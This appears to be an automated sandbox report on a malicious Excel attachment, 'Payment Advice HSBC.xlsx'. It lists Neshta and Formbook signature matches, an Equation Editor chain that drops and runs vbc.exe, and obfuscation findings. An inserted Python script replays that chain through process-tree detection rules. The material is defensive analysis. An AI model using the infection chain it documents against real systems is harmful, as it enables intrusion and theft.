Source: 5.0.vbc.exe.400000.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.11.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.19.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.13.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.19.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.17.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.13.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.15.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.469402863.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.466923037.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.468925310.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.467300347.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.468071854.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.468443002.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.467692423.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe, type: DROPPED Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, reference = Internal Research, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354
Source: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe, type: DROPPED Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, reference = Internal Research, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354
Source: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe, type: DROPPED Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, reference = Internal Research, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354
Source: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe, type: DROPPED Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, reference = Internal Research, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354
Creates files inside the system directory
Source: C:\Users\Public\vbc.exe File created: C:\Windows\svchost.com
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_012FA2A9 4_2_012FA2A9
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E1E38 4_2_001E1E38
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E72C2 4_2_001E72C2
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E55D0 4_2_001E55D0
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E17B0 4_2_001E17B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_012FA035 4_2_012FA035
Source: C:\Users\Public\vbc.exe Code function: 5_2_012FA2A9 5_2_012FA2A9
Source: C:\Users\Public\vbc.exe Code function: 5_2_012FA035 5_2_012FA035
Unable to load, office file is protected or invalid
Source: C:\Users\Public\vbc.exe Window title found: unsupported 16-bit application okthe program or feature "\??\c:\users\user\appdata\local\temp\3582-490\vbc.exe" cannot start or run due to incompatibity with 64-bit versions of windows. please contact the software vendor to ask if a 64-bit windows compatible version is available.
PE file does not import any functions
Source: Aut2exe.exe.5.dr Static PE information: No import functions for PE file found
Source: chrome_pwa_launcher.exe.5.dr Static PE information: No import functions for PE file found
Source: setup.exe0.5.dr Static PE information: No import functions for PE file found
Source: AcroTextExtractor.exe.5.dr Static PE information: No import functions for PE file found
Source: vcredist_x64.exe.5.dr Static PE information: No import functions for PE file found
Source: VC_redist.x86.exe.5.dr Static PE information: No import functions for PE file found
Source: Eula.exe.5.dr Static PE information: No import functions for PE file found
Source: setup.exe.5.dr Static PE information: No import functions for PE file found
Source: jucheck.exe.5.dr Static PE information: No import functions for PE file found
Source: Au3Info_x64.exe.5.dr Static PE information: No import functions for PE file found
Source: Aut2exe_x64.exe.5.dr Static PE information: No import functions for PE file found
Source: Au3Check.exe.5.dr Static PE information: No import functions for PE file found
Source: 32BitMAPIBroker.exe.5.dr Static PE information: No import functions for PE file found
Source: vcredist_x86.exe.5.dr Static PE information: No import functions for PE file found
Source: RdrCEF.exe.5.dr Static PE information: No import functions for PE file found
Source: chrmstp.exe.5.dr Static PE information: No import functions for PE file found
Source: armsvc.exe.5.dr Static PE information: No import functions for PE file found
Source: LogTransport2.exe.5.dr Static PE information: No import functions for PE file found
Source: AutoIt3Help.exe.5.dr Static PE information: No import functions for PE file found
Source: Uninstall.exe.5.dr Static PE information: No import functions for PE file found
Source: jusched.exe.5.dr Static PE information: No import functions for PE file found
Source: FullTrustNotifier.exe.5.dr Static PE information: No import functions for PE file found
Source: AdobeCollabSync.exe.5.dr Static PE information: No import functions for PE file found
Source: reader_sl.exe.5.dr Static PE information: No import functions for PE file found
Source: wow_helper.exe.5.dr Static PE information: No import functions for PE file found
Source: SciTE.exe.5.dr Static PE information: No import functions for PE file found
Source: ADelRCP.exe.5.dr Static PE information: No import functions for PE file found
Source: jaureg.exe.5.dr Static PE information: No import functions for PE file found
Source: AdobeARM.exe.5.dr Static PE information: No import functions for PE file found
Source: ose.exe.5.dr Static PE information: No import functions for PE file found
Source: Au3Info.exe.5.dr Static PE information: No import functions for PE file found
Source: AcroBroker.exe.5.dr Static PE information: No import functions for PE file found
Source: Wkconv.exe.5.dr Static PE information: No import functions for PE file found
Source: 64BitMAPIBroker.exe.5.dr Static PE information: No import functions for PE file found
Source: upx.exe.5.dr Static PE information: No import functions for PE file found
Source: AutoIt3_x64.exe.5.dr Static PE information: No import functions for PE file found
Source: AdobeARMHelper.exe.5.dr Static PE information: No import functions for PE file found
Source: elevation_service.exe.5.dr Static PE information: No import functions for PE file found
Source: vcredist_x86.exe0.5.dr Static PE information: No import functions for PE file found
Source: VC_redist.x64.exe.5.dr Static PE information: No import functions for PE file found
Source: dwtrig20.exe.5.dr Static PE information: No import functions for PE file found
Source: WCChromeNativeMessagingHost.exe.5.dr Static PE information: No import functions for PE file found
Source: vcredist_x64.exe0.5.dr Static PE information: No import functions for PE file found
Source: AcroRd32.exe.5.dr Static PE information: No import functions for PE file found
Source: VSTOInstaller.exe.5.dr Static PE information: No import functions for PE file found
Source: arh.exe.5.dr Static PE information: No import functions for PE file found
PE file overlay found
Source: AcroTextExtractor.exe.5.dr Static PE information: Data appended to the last section found
Source: vcredist_x64.exe.5.dr Static PE information: Data appended to the last section found
Source: Eula.exe.5.dr Static PE information: Data appended to the last section found
Source: Au3Info_x64.exe.5.dr Static PE information: Data appended to the last section found
Source: Au3Check.exe.5.dr Static PE information: Data appended to the last section found
Source: 32BitMAPIBroker.exe.5.dr Static PE information: Data appended to the last section found
Source: vcredist_x86.exe.5.dr Static PE information: Data appended to the last section found
Source: armsvc.exe.5.dr Static PE information: Data appended to the last section found
Source: LogTransport2.exe.5.dr Static PE information: Data appended to the last section found
Source: AutoIt3Help.exe.5.dr Static PE information: Data appended to the last section found
Source: Uninstall.exe.5.dr Static PE information: Data appended to the last section found
Source: jusched.exe.5.dr Static PE information: Data appended to the last section found
Source: FullTrustNotifier.exe.5.dr Static PE information: Data appended to the last section found
Source: reader_sl.exe.5.dr Static PE information: Data appended to the last section found
Source: wow_helper.exe.5.dr Static PE information: Data appended to the last section found
Source: ADelRCP.exe.5.dr Static PE information: Data appended to the last section found
Source: jaureg.exe.5.dr Static PE information: Data appended to the last section found
Source: ose.exe.5.dr Static PE information: Data appended to the last section found
Source: Au3Info.exe.5.dr Static PE information: Data appended to the last section found
Source: AcroBroker.exe.5.dr Static PE information: Data appended to the last section found
Source: 64BitMAPIBroker.exe.5.dr Static PE information: Data appended to the last section found
Source: upx.exe.5.dr Static PE information: Data appended to the last section found
Source: AdobeARMHelper.exe.5.dr Static PE information: Data appended to the last section found
Source: vcredist_x86.exe0.5.dr Static PE information: Data appended to the last section found
Source: dwtrig20.exe.5.dr Static PE information: Data appended to the last section found
Source: WCChromeNativeMessagingHost.exe.5.dr Static PE information: Data appended to the last section found
Source: vcredist_x64.exe0.5.dr Static PE information: Data appended to the last section found
Source: VSTOInstaller.exe.5.dr Static PE information: Data appended to the last section found
Source: arh.exe.5.dr Static PE information: Data appended to the last section found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: vbc[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: VC_redist.x64.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: VC_redist.x86.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Aut2exe.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Aut2exe_x64.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: upx.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: VC_redist.x64.exe.5.dr Static PE information: Section: .rsrc ZLIB complexity 1.00537109375
Source: VC_redist.x64.exe.5.dr Static PE information: Section: .reloc ZLIB complexity 1.021484375
Source: VC_redist.x86.exe.5.dr Static PE information: Section: .rsrc ZLIB complexity 1.00537109375
Source: VC_redist.x86.exe.5.dr Static PE information: Section: .reloc ZLIB complexity 1.021484375
Source: Aut2exe.exe.5.dr Static PE information: Section: .rsrc ZLIB complexity 1.00537109375
Source: Aut2exe.exe.5.dr Static PE information: Section: .reloc ZLIB complexity 1.021484375
Source: Aut2exe_x64.exe.5.dr Static PE information: Section: .rsrc ZLIB complexity 1.00537109375
Source: Aut2exe_x64.exe.5.dr Static PE information: Section: .reloc ZLIB complexity 1.021484375
Source: Payment Advice HSBC.xlsx Virustotal: Detection: 34%
Source: Payment Advice HSBC.xlsx ReversingLabs: Detection: 31%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Payment Advice HSBC.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE10B.tmp
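The process and file-creation lines above describe the chain EXCEL.EXE, then EQNEDT32.EXE started out of process with -Embedding, then vbc.exe dropped to C:\Users\Public, spawned by the equation editor and re-spawned by itself, before svchost.com is written into C:\Windows. The script below replays that chain as constructed Sysmon-style events and runs the detections a responder would key on it: the equation editor spawning a child, the equation editor dropping a file, execution from a user-writable folder, and a user-folder process writing into the system directory. This is an added example, not part of the Joe Sandbox report; the event records and pids are constructed, only the paths come from the report.

```python
"""Replay of this report's Equation Editor chain through a few process-tree
detections. Added example, not part of the sandbox report: the events are
constructed Sysmon-style records (EventID 1 = process create, 11 = file
create) that reuse the report's paths; the pids are made up.
"""
import ntpath

SUSPICIOUS_DIRS = ("c:\\users\\public\\", "c:\\programdata\\")
SYSTEM_DIR = "c:\\windows\\"

EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
VBC = r"C:\Users\Public\vbc.exe"

# Constructed telemetry. EQNEDT32.EXE is a COM server started by the DCOM
# launcher, so its parent is not EXCEL.EXE; ppid 0 stands in for that.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 100, "ppid": 0, "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"},
    {"id": 1, "pid": 200, "ppid": 0, "image": EQNEDT32},
    {"id": 11, "pid": 200, "target": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe"},
    {"id": 11, "pid": 200, "target": VBC},
    {"id": 1, "pid": 300, "ppid": 200, "image": VBC},
    {"id": 1, "pid": 400, "ppid": 300, "image": VBC},
    {"id": 11, "pid": 400, "target": r"C:\Windows\svchost.com"},
]


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def analyze(events):
    """Return (rule, pid, detail) tuples; events must be in chronological order."""
    image_of = {}  # pid -> image path, learned from EventID 1 as we go
    alerts = []
    for ev in events:
        if ev["id"] == 1:
            image_of[ev["pid"]] = ev["image"]
            parent = image_of.get(ev["ppid"], "")
            if _base(parent) == "eqnedt32.exe":
                alerts.append(("eqnedt32_spawns_child", ev["pid"], ev["image"]))
            if ev["image"].lower().startswith(SUSPICIOUS_DIRS):
                alerts.append(("exec_from_suspicious_folder", ev["pid"], ev["image"]))
        elif ev["id"] == 11:
            writer = image_of.get(ev["pid"], "")
            if _base(writer) == "eqnedt32.exe":
                alerts.append(("eqnedt32_drops_file", ev["pid"], ev["target"]))
            if writer.lower().startswith(SUSPICIOUS_DIRS) and ev["target"].lower().startswith(SYSTEM_DIR):
                alerts.append(("user_dir_process_writes_system_dir", ev["pid"], ev["target"]))
    return alerts


def ancestry(events, pid):
    """Image names from the oldest known ancestor down to pid (for a tree view)."""
    parent_of = {e["pid"]: e["ppid"] for e in events if e["id"] == 1}
    image_of = {e["pid"]: e["image"] for e in events if e["id"] == 1}
    chain = []
    while pid in image_of:
        chain.append(_base(image_of[pid]))
        pid = parent_of[pid]
    return chain[::-1]


if __name__ == "__main__":
    for rule, pid, detail in analyze(SAMPLE_EVENTS):
        print(f"{rule:36} pid={pid} {' > '.join(ancestry(SAMPLE_EVENTS, pid))}: {detail}")
```

Two points the replay makes visible. First, ancestry() stops at EQNEDT32.EXE: because the equation editor is launched over COM rather than as a child of Excel, a rule that keys on EXCEL.EXE as the parent never fires, which is why the rules above key on EQNEDT32.EXE itself. Second, the Content.IE5\...\vbc[1].exe path the report lists is the WinINet cache entry, so the equation editor fetched the payload over HTTP before writing C:\Users\Public\vbc.exe; a network event from EQNEDT32.EXE would precede the two file drops in real telemetry.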
Source: classification engine Classification label: mal100.spre.troj.expl.evad.winXLSX@7/103@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\Public\vbc.exe Mutant created: \Sessions\1\BaseNamedObjects\mmsBFhjVBcbveI
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

.NET source code contains potential unpacker
Source: vbc[1].exe.2.dr, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc.exe.2.dr, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.vbc.exe.12f0000.1.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.12f0000.0.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E1298 push esp; retn 0013h 4_2_001E1321
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E8F9C push eax; ret 4_2_001E8F9D
Source: C:\Users\Public\vbc.exe Code function: 5_2_004080C0 push 004080E6h; ret 5_2_004080DE
Source: C:\Users\Public\vbc.exe Code function: 5_2_004070F4 push 00407120h; ret 5_2_00407118
Source: C:\Users\Public\vbc.exe Code function: 5_2_004041D8 push 00404204h; ret 5_2_004041FC
Source: C:\Users\Public\vbc.exe Code function: 5_2_004041A0 push 004041CCh; ret 5_2_004041C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404256 push 00404284h; ret 5_2_0040427C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404258 push 00404284h; ret 5_2_0040427C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404210 push 0040423Ch; ret 5_2_00404234
Source: C:\Users\Public\vbc.exe Code function: 5_2_004042C8 push 004042F4h; ret 5_2_004042EC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404290 push 004042BCh; ret 5_2_004042B4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404370 push 0040439Ch; ret 5_2_00404394
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404300 push 0040432Ch; ret 5_2_00404324
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404338 push 00404364h; ret 5_2_0040435C
Source: C:\Users\Public\vbc.exe Code function: 5_2_004043E0 push 0040440Ch; ret 5_2_00404404
Source: C:\Users\Public\vbc.exe Code function: 5_2_004043A8 push 004043D4h; ret 5_2_004043CC
